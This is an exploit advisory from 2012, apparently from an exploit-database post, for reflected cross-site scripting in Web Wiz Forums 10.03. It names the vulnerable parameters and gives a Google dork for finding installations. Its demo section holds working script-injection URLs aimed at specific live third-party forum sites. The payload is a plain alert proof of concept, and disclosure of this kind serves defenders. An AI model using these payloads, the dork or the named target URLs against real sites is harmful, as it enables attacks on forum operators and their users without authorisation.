############# # Exploit Title: web wiz forums 10.03 Cross Site Scripting Vulnerability # # Google Dork: intext:"powered by web wiz forums 10.03" # # Date: 08/24/2012 # # Author: Crim3R # # download Link : http://www.webwiz.co.uk/web-wiz-forums/forum-downloads.htm # # Tested on: all # ################################################################################### ====================================== the searchIn ThreadPage in post_message_form.asp file is Vulnerable to Cross Site Scripting also ForumID parametr in forum_members.asp file Note : Lower Versions can also be Vulnerable D3M0 : http://www.agni.gr/message_boards/forum_members.asp?find=S&ForumID=%22%3E%3Cscript%3Ealert(0);%3C/script%3E http://www.canadianracer.com/forum/forum_members.asp?find=S&ForumID=%22%3E%3Cscript%3Ealert(0);%3C/script%3E http://www.agni.gr/message_boards/post_message_form.asp?ForumID=63&mode=new&PagePosition=0&ReturnPage=Thread&ThreadPage="><script>alert(0);</script>&TopicID=57676 ===============Crim3R@Att.Net========= $Home = %00 thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir